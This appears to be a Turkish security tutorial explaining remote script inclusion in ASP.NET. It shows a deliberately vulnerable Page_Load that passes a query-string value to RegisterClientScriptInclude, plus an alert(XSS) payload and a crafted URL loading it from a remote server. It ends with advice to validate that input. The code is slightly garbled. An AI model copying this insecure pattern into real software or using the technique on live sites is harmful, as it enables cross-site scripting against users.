RFI saldırılarını göz önüne alacak olursak arkadaşlar ASP.NET uygulamaları yaygın olarak kullanılan PHP uygulamalarına göre daha güvenilirdirler , nedeninden bahsedecek olursak .NET uygulama çatısı özellikle PHP gibi uzak sunucuda bulunan zararlı kod parçasının alıp uygulamanın bir parçasıymış gibi yorumlanmaz.Dolayısıyla uygulama geliştirme esnasında özellikle bir dinamik kod yorumlama için özelleştirilmiş metotlar kullanılmamış ise bu tür zaafiyetin oluşması çokta olası değildir. Dinamik kod yorumlama için yazılabilecek metotlarda açıkcası klasik web uygulamaları içerisinde ihtiyaç duyulan özelliklerden değildir.
Amma velakin ASP.NET uygulamaları uzaktan istemci taraflı kodların çalıştırılmasına olanak sağlamaktadır. Örnek olarak aşağıda yazacağımız kod parçasını inceleyelim ;
protected **** Page_Load(object sender, EventArgs e)
{
string js = Request.QueryString[’’js’’];
if (js == null) { js = ’’js/deneme.js’’;
} page.clientscript.registerclientscriptinclude(this .GetType(),’’test.js’’,js);
}
’’RegisterClientScriptİnclude’’ tırnak içerisinde belirtmiş olduğumuz kod yerel veya uzak sunucudan javascript kodları uygulama içine eklenebilir.Eğer eklenecek javascript kod dosyası kullanıcıdan gelen bir parametre yardımı ile sağlanıyor ise bu parametrenin manipüle edilmesi sayesinde uzak sunucuda bulunan kod parçacığı uygulamaya ekletilip , çalıştırılabilir.
Şimdi örnekleyecek olursak ;
[ismail@asprfı]# cat shell.js
alert(XSS);
Şimdi uzak sunucumuzda oluşturduğumuz shell.js dosyasının içeriğini görüntülemiş olduk , şimdi bunu asp.net ile oluşturulmuş sitemizde zaafiyet denemesi olarak kullanalım ;
Http://www.sdss.com/rfı.aspx?js=www.ssssda.com/rfı.aspx?js=shell.js
İlgili dosya javascript kodu icra edilecek ve XSS zaafiyeti oluşturulacaktır , dolayısıyla kullanıcılardan alınan parametrelerin herhangi bir kontrolen geçmeden registerclientscriptınclude içerisinde kullanılmaması gerekmektedir .
